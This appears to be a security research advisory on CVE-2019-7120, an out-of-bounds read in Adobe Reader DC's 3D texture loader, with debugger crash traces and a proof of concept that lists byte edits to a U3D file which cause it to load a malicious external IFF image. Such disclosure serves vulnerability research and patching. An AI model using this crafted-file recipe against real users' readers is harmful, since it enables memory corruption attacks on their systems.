Advisories

Acrobat Reader DC 2d.x3d!_LoadILBM() Out-of-Bounds Read in TIF::Read()

CVE ID

CVE-2019-7120

Tested Versions

  • Adobe Reader DC 2019.010.20064

Product URL(s)

  • https://acrobat.adobe.com/us/en/acrobat.html
  • https://get.adobe.com/reader/

Adobe Acrobat is a family of application software and Web services developed by Adobe Inc. to view, create, manipulate, print and manage files in Portable Document Format (PDF). It provides compatibility to the ECMA-363 Standard (Universal 3D File Format) via 3difr.x3d, 2d.x3d and rt3d.dll, which allow viewing embedded 3D contents in PDF files. The ECMA-363 standard allows external texture images to be encoded with the Texture Resource Declaration Block, with options to load either JPEG/PNG images embedded in the PDF file, or other image types from the local file system. These external image formats include TGA, TIFF, PIC, GIF, BMP, PCX, PPM, IFF, FLI/FLC, RGB, PSD, RLE and CEL. The 2d.x3d module is activated when the users choose to enable 3D content display.

Vulnerabilities in this module do not affect a default installation, however, in certain industry sectors that have frequent exchange of 3D PDF files (e.g., CAD designs), 3D contents may be enabled as default, leaving users vulnerable to this attack vector.

Vulnerability

An out-of-bounds read can be observed in the context of the sandboxed process as the logged on user.

# The debugging and analysis were done on an Adobe Reader DC 2019.010.20064.
# The stack trace at crash site:

(13d0.c14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=00000000 ebx=00000015 ecx=1ccecfff edx=33561140 esi=000000c0 edi=00000003
eip=6a8d4985 esp=00afab78 ebp=00afac00 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010297
2d!png_set_filter_heuristics+0x1527:
6a8d4985 8a4101          mov     al,byte ptr [ecx+1]        ds:002b:1cced000=??

0:000> kb
 # ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00afac00 6a8d5195 402c88bf 2cec8f90 28bf6fb0 2d!png_set_filter_heuristics+0x1527
01 00afac90 6a8d28d4 2c12afa8 1ce34e68 28bf6fb0 2d!png_set_filter_heuristics+0x1d37
02 00afaca4 6b47779f 00000006 2c12afa8 1ce34e68 2d!E3DLLFunc+0xa16
03 00afacc4 6b43ae03 2cec8f90 00000006 2c12afa8 rt3d!FILETYPE::Func2d+0x5e
04 00afb14c 6b439399 332415a8 00afb604 00000000 rt3d!PrepareRescale+0xac8
05 00afb184 6b46c7fd 332415a8 00afb604 00000000 rt3d!GetPicture+0x2e
06 00afb3c0 6b46d50a 332415a8 00afb604 00000000 rt3d!EndPicturesCache+0x5352
07 00afb830 6b46ca3f 332414e8 332415a8 00afbe78 rt3d!EndPicturesCache+0x605f
08 00afc084 6b46ccfa 332414e8 00000000 28bf6fb0 rt3d!EndPicturesCache+0x5594
09 00afc2e4 6b41fda1 218fecb0 28bf6fb0 00000000 rt3d!EndPicturesCache+0x584f
0a 00afc304 6b3a77ea 00000002 28bf6fb0 7ffdfbca rt3d!e3_SCENE::MovePDVToCameraNode+0xfcd
0b 00afc784 6b373ebd 00000000 1c5b8fc8 00000000 rt3d!V4CUnloadRT+0x30b97
0c 00afc79c 6cc0c267 1c5b8fc8 00000000 00afc7f0 rt3d+0x3ebd

Brief analysis:

0:000> u
2d!png_set_filter_heuristics+0x1527:
6a8d4985 8a4101          mov     al,byte ptr [ecx+1]
6a8d4988 8802            mov     byte ptr [edx],al
6a8d498a 8a4102          mov     al,byte ptr [ecx+2]
6a8d498d 884201          mov     byte ptr [edx+1],al
6a8d4990 0fb745f4        movzx   eax,word ptr [ebp-0Ch]
6a8d4994 43              inc     ebx
6a8d4995 03d7            add     edx,edi
6a8d4997 3bd8            cmp     ebx,eax

# A variant of this issue crashes at 2d!png_set_filter_heuristics+0x150a:
(258.1a08): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=00000000 ebx=00000000 ecx=30387000 edx=3315bc01 esi=00000100 edi=00000004
eip=6a844968 esp=003db2f4 ebp=003db37c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
2d!png_set_filter_heuristics+0x150a:
6a844968 8a4101          mov     al,byte ptr [ecx+1]        ds:002b:30387001=??

0:000> u
2d!png_set_filter_heuristics+0x150a:
6a844968 8a4101          mov     al,byte ptr [ecx+1]
6a84496b 8842ff          mov     byte ptr [edx-1],al
6a84496e 8a4102          mov     al,byte ptr [ecx+2]
6a844971 8802            mov     byte ptr [edx],al
6a844973 8a4103          mov     al,byte ptr [ecx+3]
6a844976 884201          mov     byte ptr [edx+1],al
6a844979 8a01            mov     al,byte ptr [ecx]
6a84497b 884202          mov     byte ptr [edx+2],al

The call stack near the crash site is resolved as:

#0 TIF::Read(void)
#1 _LoadILBM(e3_STREAM *, e3_PICTURE *, e3_CONTEXT *)
#2 IFFImport(unsigned int, e3_STREAM *, e3_PICTURE *, e3_interface *)
#3 ...

Adobe has patched this bug as an out-of-bounds write.

Proof of Concept

To load external image with shading_M.u3d:

000002f0: 28 7c 3f 00 00 00 00 00 14 ff ff ff 3c 00 00 00  (|?.........<...
00000300: 00 00 00 00 05 00 6c 69 6e 65 73 02 00 00 00 00  ......lines.....
00000310: 00 00 00 00 01 00 00 00 55 ff ff ff 1c 00 00 00  ........U.......
00000320: 00 00 00 00 05 00 6c 69 6e 65 73 00 01 00 00 00  ......lines.....
00000330: 01 00 00 0e 01 00 00 00 01 0e 00 00 52 dc 00 00  ............R...

The following modifications are made to the above block:

# Modify the containing Modifier Chain Block (0xFFFFFF14) length:
; shading_M.u3d: change data size field to 0x54 from 0x3C

# Texture Resource Declaration Block (0xFFFFFF55):
; shading_M.u3d: change data size field to 0x34 from 0x1A

# 2d.x3d Image Loading construction from shading_M.u3d
; 05 00 6c 69 6e 65 73       // Texture Name String: "lines"
; 00 01 00 00                // U32: Texture Height
; 00 01 00 00                // U32: Texture Width
; 0e                         // U8: Texture Image Type: 0x0E color RGB
; 01 00 00 00                // U32: Continuationi Image Count
;                            // Now the Continuation Image Format record
; 01                         //    U8: Compression Type 0x01 JPEG-24
; 0e                         //    U8: Texture Image Channels
; 00 00                      //    U16: Continuation Image Attributes: default
; 52 dc 00 00                //    U32: Image Data Byte Count

# Modify to the following:
; 05 00 6c 69 6e 65 73       // Texture Name String: "lines"
; 00 01 00 00                // U32: Texture Height 
; 00 01 00 00                // U32: Texture Width 
; 0e                         // U8: Texture Image Type: 0x0E color RGB 
; 01 00 00 00                // U32: Continuationi Image Count 
;                            // Now the Continuation Image Format record:
; 02                         //    U8: Compression Type 0x02 PNG
; 0e                         //    U8: Texture Image Channels
; 01 00                      //    U16: Continuation Image Attributes: external
; 01 00 00 00                //    U32: Image URL Count 1
;                            //    0x16 bytes string "httpAAAAAAAsynAA12.iff"
; 16 00 68 74 74 70 41 41 41 41 41 41 41 73 79 6e 41 41 31 32 2e 69 66 66

Vendor Response

The vendor has acknowledged the issue and released an update to address it.

The vendor’s advisory can be found here: APSB19-17.

Timeline

  • 2019-01-25 Vendor disclosure
  • 2019-04-09 Vendor patched

Credit

Discovered by Wei Lei

Want to participate in such cutting-edge research?

We are hiring!

Find Out More